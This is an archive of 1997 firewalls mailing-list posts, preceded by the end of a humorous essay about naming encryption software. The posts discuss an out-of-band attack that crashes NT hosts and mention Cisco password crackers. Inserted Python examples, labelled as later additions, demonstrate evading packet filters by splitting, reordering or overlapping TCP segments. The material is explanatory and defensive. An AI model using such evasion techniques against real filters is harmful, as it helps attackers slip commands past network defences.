    for they replace the penis, the absence of which is the cause of the
    horror. This is a confirmation of the technical rule according to
    which a multiplication of penis symbols signifies castration.

        Sigmund Freud
        The Medusa's Head

You had to hand it to Sigmund. He was nothing if not authoritative, and after reading his inspiring words on the terrific serpent haired woman, it became clear to me that _Proffs_ and the Gorgon had somewhat unresolved metaphorical incompatibilities. I didn't want my software giving anyone a castration complex. I decided to put aside the denizens of Olympus from contest verbatim. I'd read Fraud on Perversions a few years before and knew Medusa was just a portent of what was to come. What I needed was another polytheist culture entirely.

Latin didn't help me. Nearly all the Roman Gods had been vilely plagiarised from the Greeks, Latin names or not. Freud knew this as well as I did. The Norse gods were of little assistance to me. The only one worth paying school to was Loki, the Norse god of mischief. Loki was a very cool fellow, which was why his name has been appropriated as a moniker by virtually every Bjorn, Sven, and Bob hacker to come out of Scandinavia in the last 10 years. No, Loki was not for me. The problem craved for a polytheist mythology outside the realm of my, and more importantly Sigmund Freud's, Western European upbringing. The answer to my question was by definition locked within a body of history I didn't know an onion skin about.
In order for the pilgrim to reach the master he must first place his foot on the path, no matter how gradual the slope up the mountain of enlightenment. Zen Buddhism is good like that. Fabricating parables up as you go along, that is.

    Zen master Gutei raised his finger whenever he was asked a question
    about Zen. A young novice began to imitate him in this way. When Gutei
    was told about the novice's imitation, he sent for him and asked him
    if it were true. The novice admitted it was so. Gutei asked him if he
    understood. In reply the novice held up his index finger. Gutei
    promptly cut it off. The novice ran from the room, howling in pain. As
    he reached the threshold, Gutei called, "Boy!". When the novice
    returned, Gutei raised his index finger. At that instant the novice
    was enlightened.

But wait. This Koan isn't fabricated. At least, not by me. And unlike most Zen Koans I think you will agree that it pleasantly satisfies Schopenhauer's "life, without pain, has no meaning". However, semantically I'm seeing a very unhealthy correlation to forgetting one's encryption key and losing one's finger.

My mind is drawn to the memory of the real-life nightmare of lying in the easy-chair of a Swanston St. hypnotherapist suite, gazing intently into a bright, but distant red light, while chanting the mantra "I am not cynical about hypnotherapy. I am not cynical about hypnotherapy. I am not cynical about an Indian doctor with a 5th floor office decorated coup'd'Edelstien. I'm not cynical about a man who claims that his foremost clientele are rich middle aged women who have put their jewellery somewhere "safe" and consequently are unable to recall the location. I'm not cynical about a hypnotist who extols the virtues of having a M.D. so his patients can claim 2/3rds of the cost of these jewellery retrieval sessions under Medicare. I'm not cynical that these middle aged women are in fact suffering from some form of Mesmer complex. And by all the powers in Heaven, I have no pessimism about recalling my god-damned pass-phrase!".

I never did remember the pass-phrase and you will notice Gutei keeps very quiet about what he does with the novice's finger. In this particular case, given the value of the data, I would have traded places with Gutei's novice, before you can say "Boy! Was I enlightened".

I put my chin on my knee, and stare at the grain of my beige plastic monitor case. Unless I could jump into another reality it was the end of the line for _Proffs_ and _One Man's Search for a Cryptographic Mythology_. Boy! Was I bummed.

One of the great sins of us programmers is procedural thinking. And it was exactly this sort of folly I was engaging in. There were around 6 billion other realities going about their business. I grant you that 2 billion of these were no doubt indulging in the confusion and diffusion of an avalanche of pseudo-random mental images and sequences we associate with dreams, and probably another 2 billion busy expanding their minds with the powerful products of hash or decaying into a compressive state of increasing entropy and beer rounds. This still left a select 2 billion souls with which to weave my work. If I approached them directly rather than by analysing the information trails they left behind, I'd stand a good chance of getting my feet onto the path of cryptographic mythological enlightenment.

I have a Swedish friend who calls himself Elk on odd days and Godflesh on even days. Don't ask why. As far as I know he's not bisexual. Elk listened to my quest for cryptographic myth. He had pondered, and uncovered a diamond in the rough. MARUTUKKU.

    The third name is MARUTUKKU, Master of the arts of protection,
    chained the Mad God at the Battle. Sealed the Ancient Ones in their
    Caves, behind the Gates.

F a r  o u t. Master of the arts of protection. Chained the Mad God. Sealed the Ancient Ones in their Caves, behind the Gates. Even the very word MARUTUKKU looks like it has been run through a product cipher.

But I wasn't about to trust the work of a self-admitted Swedish Sumeria freak who was obviously suffering from a bi-polar moniker disorder. Was it mere coincidence that MARUTUKKU was an anagram for KUKU MART and KUKU TRAM? I didn't want MARUTUKKU to end up as another cog in the annals of Freudian analogy. What I needed was the sort of Authoritative History that only Princeton's history faculty could provide.

    The tablets of the Enuma Elish: The Akkadian Creation Epic

    Based on the translation of E. A. Speiser, with the additions by A. K.
    Grayson, Ancient Near-Eastern Texts Relating to the Old Testament,
    third edition, edited by James Pritchard (Princeton, 1969), pp.
    60-72; 501-503, with minor modifications.

    This work, the ancient Mesopotamian creation epic consisting of seven
    tablets, tells of the struggle between cosmic order and chaos. It is
    named after its opening words. It was recited on the fourth day of
    the ancient Babylonian New Year's festival. The text probably dates
    from the Old Babylonian period, i.e., the early part of the second
    millennium B.C.E.

    [...]

    The third name is MARUTUKKU
    Master of the arts of protection, chained the Mad God at the Battle.
    Sealed the Ancient Ones in their Caves, behind the Gates.

    [...]

    MARUTUKKU truly is the refuge of his land, city, and people.
    Unto him shall the people give praise forever.
    All praise the MARUTUKKU!

My search had borne a ripe and tasty fruit indeed. The quest for a cryptographic mythology was complete. Or was it?

The words of Hume kept coming back to me and I had a nagging feeling that there was some substance in them. If MARUTUKKU was my exquisite cryptographic good, of wit, effusive joy, ravishing pleasure and flattering hope; then where was the counter point? The figure to its ground - the sharper evil, the madness, the melancholy, the most cruel lassitudes and disgusts and the severest disappointments. Was Hume right? Because if he was, there was only one organisation this string of hellish adjectives could represent. The cryptographic devil with its 500,000 sq feet of office space in Maryland. But surely there could be no reference to such an organisation in the 4,000 year old Babylonian tablets. The idea was preposterous. Wasn't it?

    TABLET VII OF THE ENUMA ELISH:

    ESIZKUR shall sit aloft in the house of prayer;
    May the gods bring their presents before him,
    that from him they may receive their assignments;
    none can without him create artful works.
    Four black-headed ones are among his creatures;
    aside from him no god knows the answer as to their days.

It's a cold and wintry night, here in Melbourne. Despite this, the gusts of wind and rain seem to be unusually chilling. What had I, in my search for a cryptographic mythology, stumbled onto? I look hard at the seven letters E-S-I-Z-K-U-R. A frown turns to a smile and then a dead pan stare. I write down:

    IRK ZEUS

--
Prof. Julian Assange  |If you want to build a ship, don't drum up people
                      |together to collect wood and don't assign them tasks
proff@iq.org          |and work, but rather teach them to long for the endless
proff@gnu.ai.mit.edu  |immensity of the sea.
                      |-- Antoine de Saint Exupery

From owner-firewalls-outgoing Fri Jun 6 02:31:44 1997
From: Eric Vyncke
Date: Fri, 06 Jun 1997 09:54:54 +0000
To: "Jonathan M. Bresler", Cy Ardoin
Cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)

At 13:18 5/06/97 -0400, Jonathan M. Bresler wrote:
>
>>I don't think there is anything an application firewall can
>>do that can't also be done by a "packet filter" firewall. The
>
> trivial example:
> a smtp application level proxy can disable the "debug" command
>for every sendmail behind that firewall.

This kind of stuff is also done in some full-state inspection firewalls :-)

>
>>new packet filter firewalls are not like the old Cisco/Bay router
>>filters. The new systems operate at the network layer, but they
>>have knowledge of the protocols and applications. They
>>open up the packets and modify the data. These systems are
>>doing content filtering and other "application" types of operations.
>>Yes, not all of them do these things, but many do, and new
>>feature/functions are being added to these systems every year.
>
>jmb
>
>
>--
>Jonathan M. Bresler   202-452-2831   breslerj@frb.gov
>MS-169  Federal Reserve Board of Governors  Washington DC 20551
>Speaking for myself. Others speak for the Federal Reserve Board of Governors
>
>

Eric Vyncke                      Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677            Fax:    +32-2-778.4300
E-mail: evyncke@cisco.com        Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 03:10:18 1997
From: syscrash@milehigh.net (Brian Delgado)
Date: Thu, 05 Jun 1997 09:06:07 +0000
To: firewalls@greatcircle.com
Subject: Raptor firewall

I am kind of a beginner at this so I apologize if this question is basic, but I figured this would be the best forum to get a valid answer. Here is my question:

I am setting up Raptor on a Windows NT 4.0 server. I am currently running DNS on a SUN platform for internal name resolution. I realize that Raptor is an application gateway. Does this mean I have to run my name server on the Bastion host or can I continue to run it where I am currently?

Any help would be appreciated.

Brien Delgado

From owner-firewalls-outgoing Fri Jun 6 03:16:52 1997
From: Robert Ståhlbrand
Date: Fri, 6 Jun 1997 07:35:01 +0200
To: 'Mike Hedlund'
Cc: 'firewalls@greatcircle.com'
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

What is the problem here???

Of course (as Mike Hedlund says) an NT machine (win95 and win3.11 as well) is only vulnerable to the OOB bug on port 139 (netbios) and I REALLY HOPE that nobody lets this service through their firewall. And even if you are using an NT firewall (nuts but anyway) this should really be no problem.

So, what is the problem???

Robert Ståhlbrand
Network-, System-responsible NMAC and OPLAB domains.
Ericsson Telecom AB Box 333, Fl=F6jelbergsgatan 1C 43124 M=F6lndal Phone number +46 31 7476162 Fax number +46 31 7473777 Email: robert.stahlbrand@nmac.ericsson.se > -----Original Message----- > From: Mike Hedlund [SMTP:mike@isi.net] > Sent: den 5 juni 1997 20:05 > To: Daniel Strawson > Cc: Jyri Kaljundi; Greg Loffel; fw-1-mailinglist@us.checkpoint.com; > Firewalls mailing list > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts >=20 >=20 >=20 > If i remember correctly, the OOB attack with NT only effected port > 139, > NetBios. I tried it on all other tcp ports and it had no effect. So > the > only way Firewall-1 would be effected by it would be if it has its = own > bug.. altho i could be mistaken.. if i am somone please correct me. = :) >=20 > -mike >=20 > [Robert St=E5hlbrand] =20 > Absolutely correct!!!=20 > On Thu, 5 Jun 1997, Daniel Strawson wrote: >=20 > >=20 > > Hang on a moment. > >=20 > > Let me put this in perspective. > >=20 > > As I understand it, this problem results from sending packets with = a > > particular IP option set in the header. (Please confirm I'm right > here > > someone). > >=20 > > Firewall _SHOULD_ drop all packets with IP options set. This would > mean > > that all Firewall-1 systems and systems behind Firewall-1 are > impervious > > to this attack. (something for Checkpoint to be proud of). > >=20 > > Unfortunately this is not the case - as I say I've managed to get = NT > to > > crash with FW-1 installed. > >=20 > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 > to > > crash, you get the NT system that it is running on to crash, so it > is not > > an insecurity, but a claimed feature that doesn't work. > >=20 > > So, either - > >=20 > > - The IP Options drop code in FW-1 doesn't work. > >=20 > > or > >=20 > > - I do not properly understand this attack and it does not work as > I > > imagine - in this case, please correct me. 
> >
> > Cheers,
> >
> > Daniel
> >
> >
> >
> > On Thu, 5 Jun 1997, Jyri Kaljundi wrote:
> >
> > > On Wed, 4 Jun 1997, Daniel Strawson wrote:
> > >
> > > > We tried it and, yes, we managed to crash an NT based Firewall-1 system. This is odd since (if memory serves) the packets should be dropped on the floor by the stateful inspection module.
> > >
> > > You mean you can crash an NT FW-1 by sending OOB data to it?! That's scary if it is true and should be addressed by Check Point ASAP!
> > >
> > > What I have always thought of FW-1 is that it operates at quite a low level inside the OS kernel, so that as long as you filter everything the network bugs in the OS don't really matter, as the packets never reach FW-1.
> > >
> > > If sending some bytes of data to FW1 crashes it and the OS, this combination (FW1+NT) should not be used as a firewall solution at all. Maybe someone from CP could explain how much the bugs in the OS matter once FW1 is installed.
> > >
> > > Jüri
> > >
> > >
> >
> >

From owner-firewalls-outgoing Fri Jun 6 03:44:00 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA20259 for firewalls-outgoing; Thu, 5 Jun 1997 19:13:09 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA20224 for ; Thu, 5 Jun 1997 19:12:58 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id TAA10617 for ; Thu, 5 Jun 1997 19:20:26 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA23601; Thu, 5 Jun 97 19:18:43 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id TAA13786 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 5 Jun 1997 19:17:38 -0700 (PDT)
Message-Id: <199706060217.TAA13786@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 795ED84F44DAAEF7882564AE000D0505; Thu, 5 Jun 97 19:17:36 EDT
To: "Steve Rudolph"
Cc: "David Harvey-George" , firewalls
From: Ryan Russell/SYBASE
Date: 5 Jun 97 19:24:08 EDT
Subject: Re: FW-1 and IP Forwarding on NT Box
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Retrieving and/or resetting the Cisco password is fairly trivial if there is a console port on that card.. haven't used the card version, but I've done it on real 2500's many times. Search the Cisco web site for "password recovery." If they've turned on password encryption, you can either change the password, or do a web search for Cisco password crackers; I've seen a couple. Haven't tried those.
Ryan

---------- Previous Message ----------
To: david, firewalls
cc:
From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp
Date: 06/05/97 08:26:39 AM
Subject: Re: FW-1 and IP Forwarding on NT Box

David and group....

I have already got this running. Thank you to all who responded to my inquiry. I have learned a lot just from the replies. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machine's network.

Now I just need to crack the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise called MCI Webmaker. This was a combination port filter router and proxy server. As it turns out Intel programmed the software (proxy) and configured the router. Vanstar installed the OS (NT), and none of the above are able to get me the router password. Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS - OK for now (:o) ). I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a PC card) in terminal mode within 60 seconds, and then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of DOS 5.0 or an old hard drive anywhere with a DOS based terminal program. This whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call.

Thanks again

Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com
http://www.rude-dog.com
http://www.rust.net/~stever
stever@rust.net

----------
> From: David Harvey-George
> To: Steve Rudolph ; firewalls@greatcircle.com
> Subject: Re: FW-1 and IP Forwarding on NT Box
> Date: Wednesday, June 04, 1997 7:14 PM
>
>
> > I followed all of Microsoft's recommendations.
>
> Possibly a bad move.
>
> > Two NIC cards a and b
>
> Sounds like the start of a stand-up comedy routine
>
>
> > A is set with default gateway of b
> > and b is set with gateway of a
>
> it is!
>
> Okay, look, the system with the two cards knows how to route to each network. All you've gotta do is set up the default gateway for workstations on network A (NIC A) and the default gateway for workstations on network B (NIC B). Don't touch anything on the router if your network really is this simple (e.g. no other routes). If you have other routes then use the route command directly.
>
> > Workstations can ping a and b
> > Workstations cannot ping network b
> > IP forwarding is enabled and my route print matches exactly the format of Microsoft's recommendations.
> >
> > I really need to get this up and running. I would get you the route print, but I cannot get the addresses to copy onto the clipboard..duh :)
>
> Yeah, I think you better send us the output from netstat on both the 'router' and the workstations.
>
> Run netstat -rn from a DoZ window, click on the little Doz icon at the left of the title bar, select edit/mark, mark the stuff you want to send, copy it and paste it.
>
> David

From owner-firewalls-outgoing Fri Jun 6 03:50:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25483 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:06 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25411 for ; Fri, 6 Jun 1997 00:50:40 -0700 (PDT)
Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26106; Fri, 6 Jun 1997 09:52:14 +0200 (METDST)
Message-Id: <3.0.32.19970606094942.006e0a64@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Fri, 06 Jun 1997 09:54:51 +0000
To: Craig Brozefsky , Bill Stout
From: Eric Vyncke
Subject: RE: PIX and Firewall-1
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Craig,

Cannot resist replying :-) Beware that I'm working for Cisco Systems ;-)

At 10:47 5/06/97 -0500, Craig Brozefsky wrote:
>On Wed, 4 Jun 1997, Bill Stout wrote:
>
>> Peter Carlson writes....
>> >in what way are application level gateways more secure than, say, FW-1 or PIX?
>> >There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?
>
>You should check out comp.security.firewalls for a good discussion of these issues. PIX is a NAT capable router with a few filtering rules thrown in; such things are hardly safe, architecturally and implementation wise. NAT is NOT, I repeat NOT! a security tool, and should not be treated as a part of your security infrastructure. Nearly all NAT tools are not designed with security in mind.
>

I both agree and disagree:

1) NAT is NOT a security feature, I agree thus 200% with you

2) but I agree at 0% with you when you say that PIX is just a NAT router with rules.
- PIX is not a router at all, it is not based on our IOS router software
- PIX is able to NAT but is not limited to NAT
- PIX is very strong due to its full-state inspection against attacks on IP, TCP, ... protocols: SYN flooding, IP spoofing, TCP/IP session hijacking, ... It also randomizes the TCP sequence numbers of the TCP sessions going through it
- PIX knows about the internals of some protocols (from ICMP to RealAudio via HTTP) and is able to check / react on these protocols
- ...

I'm stopping now because it is becoming too commercial for a technical list. But, once again: the PIX is a secure and performant component of most security architectures.

[snip...]

Best regards

Eric

Eric Vyncke
Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677
Fax: +32-2-778.4300
E-mail: evyncke@cisco.com
Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 04:02:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA03779 for firewalls-outgoing; Fri, 6 Jun 1997 01:34:23 -0700 (PDT)
Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA03732 for ; Fri, 6 Jun 1997 01:34:10 -0700 (PDT)
Received: by h01.scientia.com with SMTP id JAA03645; Fri, 6 Jun 1997 09:38:13 +0100
Message-Id: <199706060838.JAA03645@h01.scientia.com>
X-Sender: firewall@pop-server
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 06 Jun 1997 09:37:27 +0100
To: firewalls@greatcircle.com
From: Ian Miller
Subject: Re: Unknown log entry...
Cc: devin@TELERAMA.LM.COM "Tod McQuillin, as Technical Contact for zone LM.COM"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 19:05 05/06/97 -0700, Cihan Subasi wrote:
>I had those two lines in my firewall logs, can anybody explain to me what they are???
>
>--------------------------------------------------
>Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"
>Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"
>--------------------------------------------------

Your mail server has tried to do a reverse lookup on IP address 208.196.3.66 (karnov.lm.com) and has got some VERY odd results.

Reverse lookup on IP address ... is done by looking up domain ....in-addr.arpa. This should contain PTR (name->IP) records. However if you look up 208.196.3.66 you get:-

CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa"

CNAME records are name->name (alias) records. This is weird for an in-addr.arpa domain and it has, not surprisingly, confused your firewall. If you follow up the (I think nonsensical) CNAME you get:

PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com"

I have no idea why this DNS is set up this way.
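What Ian's reply describes, a CNAME sitting at the octet name inside in-addr.arpa and pointing into a deeper name that holds the PTR, is the classless in-addr.arpa delegation technique (written up as RFC 2317 in 1998): the owner of the /24 aliases each octet name into a sub-zone delegated to whoever holds the smaller block. A resolver that restarts its query at the CNAME target finds the PTR; code that expects the PTR directly at the reversed name sees nothing. The following is an added example, not part of Ian Miller's reply: a tiny in-memory zone built from the two records quoted in the thread plus constructed records on TEST-NET addresses (one plain PTR, one looping CNAME pair), and a lookup that follows CNAME chains with a length cap. All names and functions are assumptions for this example.

```python
"""Reverse lookup that follows a CNAME inside in-addr.arpa, as in the log above.

Added example, not part of the original reply. ZONE is constructed: the two
records quoted in the thread plus made-up records on TEST-NET addresses.
"""

# name -> list of (rrtype, rdata). Names are absolute (trailing dot).
ZONE = {
    # the two records Cihan's sendmail stumbled over (quoted in the thread)
    "66.3.196.208.in-addr.arpa.": [("CNAME", "66.64.3.196.208.in-addr.arpa.")],
    "66.64.3.196.208.in-addr.arpa.": [("PTR", "karnov.lm.com.")],
    # constructed: a plain PTR with no indirection
    "10.2.0.192.in-addr.arpa.": [("PTR", "host10.example.")],
    # constructed: a broken delegation whose CNAMEs loop
    "11.2.0.192.in-addr.arpa.": [("CNAME", "11.0-31.2.0.192.in-addr.arpa.")],
    "11.0-31.2.0.192.in-addr.arpa.": [("CNAME", "11.2.0.192.in-addr.arpa.")],
}

MAX_CNAME_CHAIN = 8   # assumption: cap chain length so a loop cannot hang the lookup


def reverse_name(ip: str) -> str:
    """208.196.3.66 -> 66.3.196.208.in-addr.arpa."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip}")
    return ".".join(reversed(octets)) + ".in-addr.arpa."


def lookup(name: str, rtype: str, zone=ZONE):
    """Resolver-style query: if the name owns a CNAME and no <rtype>, restart the
    query at the CNAME target (RFC 1034 section 3.6.2). Returns the rdata found,
    [] for no data, and raises RuntimeError on an over-long (looping) chain."""
    hops = 0
    while True:
        rrset = zone.get(name, [])
        answers = [rd for t, rd in rrset if t == rtype]
        if answers:
            return answers
        cnames = [rd for t, rd in rrset if t == "CNAME"]
        if not cnames:
            return []
        hops += 1
        if hops > MAX_CNAME_CHAIN:
            raise RuntimeError(f"CNAME chain longer than {MAX_CNAME_CHAIN} starting at {name}")
        name = cnames[0]


def reverse_lookup(ip: str, zone=ZONE):
    """PTR lookup that follows CNAMEs, the way a full resolver does."""
    return lookup(reverse_name(ip), "PTR", zone)


def literal_ptr(ip: str, zone=ZONE):
    """A lookup that expects the PTR directly at the reversed name and never
    follows CNAMEs: against the records above it finds no answer at all."""
    return [rd for t, rd in zone.get(reverse_name(ip), []) if t == "PTR"]


if __name__ == "__main__":
    for ip in ("208.196.3.66", "192.0.2.10"):
        print(ip, "literal:", literal_ptr(ip), "following CNAME:", reverse_lookup(ip))
```

Because the CNAME target is chosen by whoever runs the /24 zone, the only caller-side defence worth having is the chain cap: a resolver that follows CNAMEs without a limit can be sent around a loop by a misconfigured (or hostile) reverse zone.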
Ian

From owner-firewalls-outgoing Fri Jun 6 04:46:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA25369 for firewalls-outgoing; Fri, 6 Jun 1997 03:28:09 -0700 (PDT)
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA23520 for ; Fri, 6 Jun 1997 03:18:52 -0700 (PDT)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.4/8.8.4) with ESMTP id DAA25165; Fri, 6 Jun 1997 03:22:37 -0700 (PDT)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id DAA16305; Fri, 6 Jun 1997 03:22:36 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id DAA07719; Fri, 6 Jun 1997 03:22:34 -0700 (PDT)
From: Don Lewis
Message-Id: <199706061022.DAA07719@salsa.gv.tsc.tdk.com>
Date: Fri, 6 Jun 1997 03:22:34 -0700
In-Reply-To: Cy Ardoin "Re: PIX and FW-1 (packet filter Question)" (Jun 5, 2:11pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Cy Ardoin , "Jonathan M. Bresler"
Subject: Re: PIX and FW-1 (packet filter Question)
Cc: Firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Jun 5, 2:11pm, Cy Ardoin wrote:
} Subject: Re: PIX and FW-1 (packet filter Question)
} On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:
}
} >
} > >I don't think there is anything an application firewall can
} > >do that can't also be done by a "packet filter" firewall. The
} >
} > trivial example:
} > a smtp application level proxy can disable the "debug" command
} > for every sendmail behind that firewall.
}
} Finding and removing the "debug" command from smtp connections at the packet layer isn't much different than finding and altering the PORT and PASV part of the FTP command, and all the NAT style packet filters modify the FTP commands.
} It's not something packet filters do, but it is no more difficult than many of the things they already do.

What if each character in "debug" is sent in a separate TCP segment? What if the segments are sent out of order? What if "debug" is part of one TCP segment that is fragmented with overlapping fragments such that you don't see "debug" until the fragments are reassembled in a certain way? And don't forget, you need to keep track of the entire state of the SMTP connection, so that you don't drop the connection because "debug" is in the text of the message.

The reassembly and reordering is done by the TCP stack in an application proxy firewall, so the application proxy and the destination mail server will see the same cleaned-up datastream.

I seem to recall that the FW-1 ftp command stream rewriting broke if the packet boundaries happened to occur in inconvenient places (I believe they fixed this a while ago). If you're just relying on your firewall to rewrite your ftp commands, then about the worst thing a hostile ftp client could do is just not work. If you're relying on your firewall to sanitize incoming data streams, then any failure to accurately track the connection state could result in a security breach.

In principle, a stateful packet filter and an application proxy can do the same thing, but it would take a very large number of states to duplicate what the network stack does with input packets. Even if your packet filter implements an equivalent state machine, there is the danger that the destination host works in an unexpected way that still leaves it vulnerable. Probably the easiest and safest thing the packet filter can do is to throw away fragmented packets and out of order TCP segments, but I suspect that violates some of the "should" and "must" clauses in the RFCs.
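Each of Don Lewis's four objections above can be made concrete in a few lines. The following is an added example, not code from the thread: a naive filter that looks at every TCP segment on its own is run next to a filter that first reassembles the byte stream, as a proxy's TCP stack would, and then parses the SMTP command lines. The constructed traffic sends "debug" one byte per segment, sends those segments in reverse order, sends two overlapping segments whose conflicting bytes make the result depend on the reassembly policy, and finally puts "debug" inside a message body where it is not a command at all. The reassembler, the "first"/"last" overlap policies, and the simplified client-side SMTP parsing (everything after DATA up to a lone "." line is body) are this example's own assumptions.

```python
"""Why per-segment pattern matching is not the same as an application proxy.

Added example illustrating the points in the reply above; not code from the
thread. The segments below are constructed. SMTP parsing here sees only the
client side and treats everything after DATA up to the lone "." line as
message body (a simplification for this example).
"""
from typing import Dict, List, Tuple

Segment = Tuple[int, bytes]        # (sequence offset relative to the ISN, payload)


class TcpReassembler:
    """Byte-at-a-time reassembly. `policy` decides overlaps: "first" keeps the
    byte that arrived first, "last" lets later data overwrite it. Real stacks
    differ on this, which is the ambiguity the reply warns about."""

    def __init__(self, policy: str = "first") -> None:
        if policy not in ("first", "last"):
            raise ValueError("policy must be 'first' or 'last'")
        self.policy = policy
        self._bytes: Dict[int, int] = {}

    def add(self, seq: int, data: bytes) -> None:
        for i, b in enumerate(data):
            off = seq + i
            if off in self._bytes and self.policy == "first":
                continue
            self._bytes[off] = b

    def stream(self, start: int = 0) -> bytes:
        """Contiguous bytes from `start`; stops at the first hole."""
        out = bytearray()
        off = start
        while off in self._bytes:
            out.append(self._bytes[off])
            off += 1
        return bytes(out)


def smtp_command_verbs(stream: bytes) -> List[bytes]:
    """Lower-cased verbs of the client's command lines, skipping DATA bodies."""
    verbs: List[bytes] = []
    in_body = False
    for line in stream.split(b"\r\n"):
        if in_body:
            if line == b".":
                in_body = False
            continue
        verb = line.split(b" ", 1)[0].lower()
        if verb:
            verbs.append(verb)
        if verb == b"data":
            in_body = True
    return verbs


def naive_filter_blocks(segments: List[Segment], pattern: bytes = b"debug") -> bool:
    """Per-segment substring match: a packet filter with no reassembly."""
    return any(pattern in data for _, data in segments)


def proxy_filter_blocks(segments: List[Segment], policy: str = "first",
                        forbidden=(b"debug",)) -> bool:
    """Reassemble first, then decide on the parsed command stream."""
    r = TcpReassembler(policy)
    for seq, data in segments:
        r.add(seq, data)
    return any(v in forbidden for v in smtp_command_verbs(r.stream()))


# Constructed traffic
ONE_BYTE_PER_SEGMENT: List[Segment] = [(i, bytes([c])) for i, c in enumerate(b"debug\r\n")]
OUT_OF_ORDER: List[Segment] = list(reversed(ONE_BYTE_PER_SEGMENT))
# seq 0 carries "deb", seq 1 carries "XXug": offsets 1-2 overlap with conflicting data
OVERLAPPING: List[Segment] = [(0, b"deb"), (1, b"XXug\r\n")]
# "debug" appears only inside the message body, never as a command
BODY_ONLY: List[Segment] = [(0, b"MAIL FROM:<a@example.com>\r\nDATA\r\ndebug\r\n.\r\nQUIT\r\n")]

if __name__ == "__main__":
    for name, segs in (("split", ONE_BYTE_PER_SEGMENT), ("out-of-order", OUT_OF_ORDER),
                       ("overlap", OVERLAPPING), ("body", BODY_ONLY)):
        print(f"{name:13s} naive={naive_filter_blocks(segs)} "
              f"proxy(first)={proxy_filter_blocks(segs, 'first')} "
              f"proxy(last)={proxy_filter_blocks(segs, 'last')}")
```

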